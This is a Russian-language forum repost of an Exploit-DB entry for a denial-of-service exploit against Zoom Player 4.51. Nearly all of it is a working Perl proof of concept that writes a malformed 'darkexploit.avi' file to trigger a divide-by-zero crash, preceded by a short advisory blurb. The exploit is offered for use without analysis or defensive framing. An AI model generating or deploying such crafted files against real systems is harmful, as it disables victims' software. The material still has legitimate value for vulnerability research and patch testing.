Exploit Zoom Player - '.avi' Divide-by-Zero Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37471
Проверка EDB
  1. Пройдено
Автор
DARK-PUZZLE
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2012-07-02
Zoom Player - '.avi' Divide-by-Zero Denial of Service
Код:
source: https://www.securityfocus.com/bid/54249/info

Zoom Player is prone to a remote denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, resulting in denial-of-service conditions.

Zoom Player 4.51 is vulnerable; other versions may also be affected. 

#------------------------------------------------------------------------#
#                                                                        #
#                     Usage : perl zoom.pl                               #
#                                                                        #
#------------------------------------------------------------------------#

my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00 
\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50 
\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e 
\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2 
\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2 
\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29 
\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53 
\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad 
\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
\x9e\x75\x4c\x71\xa2\x9d\xfd\x65\xcc\x59\x23\xe0\xeb\xae\x58\xa3 
\xe9\xff\x16\xfc\x08\x03\x36\x4a\x69\xbb\xc4\x19\x10\x1b\xc8\x2c 
\x9e\xd9\x56\xfe\x38\x32\xf7\xe5\x2c\xd8\xb4\x6c\x31\xcc\x15\x5c 
\x41\xda\x03\xde\x5c\x23\x2d\xda\x4f\x7b\x44\x07\x60\x24\xa7\x58 
\x65\xf7\xe9\xaa\xff\x02\x9d\x1f\x39\x76\x7e\x75\x43\xac\xe5\xc9 
\xd0\x43\x2e\x4c\xeb\x81\x26\xb5\xcf\x6d\xb9\xe9\xa0\xc7\x85\x4a 
\xce\x5f\xb4\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xcb\x6e\x2a\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 

# A division by zero exploit causing a DoS to the program ( neither you can't play nothing nor close the program ) . 
#  to close the Zoom player you have to use the Windows Task Manager .


my $file = "darkexploit.avi";

open ($File, ">$file");
print $File $h;
close ($File);

#-------------------------------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы